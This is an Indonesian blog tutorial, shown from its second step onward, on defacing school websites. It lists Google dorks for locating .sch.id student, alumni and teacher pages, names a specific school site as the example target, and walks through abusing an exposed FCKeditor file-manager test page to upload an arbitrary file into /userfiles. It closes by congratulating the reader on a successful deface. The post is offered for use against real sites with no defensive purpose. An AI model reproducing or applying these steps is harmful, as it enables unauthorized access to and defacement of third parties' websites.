2 Buka Google lalu agan masukin dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
http://sman1kotabaru.sch.id 3. Exploit: /editor/filemanager/connectors/test.html
Kalo bingung masukin Exploit nya, ini contohnya
eX : http://sman1kotabaru.sch.id dimasukin exploit jadi
( http://sman1kotabaru.sch.id /editor/filemanager/connectors/test.html ) kalo udah tekan enter
Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload
http://www.[site].sch.id/userfiles/file/namafilesobat.txt
http://www.[site].sch.id/userfiles/namafilesobat.txt
jadi punya Admin masuk di
Selesai :D Kamu telah berhasil men-Deface nya walaupun bukan di Index nya (oops :)
Semoga Berhasil dan Semoga Bermanfaat ^_^
0 komentar:
Posting Komentar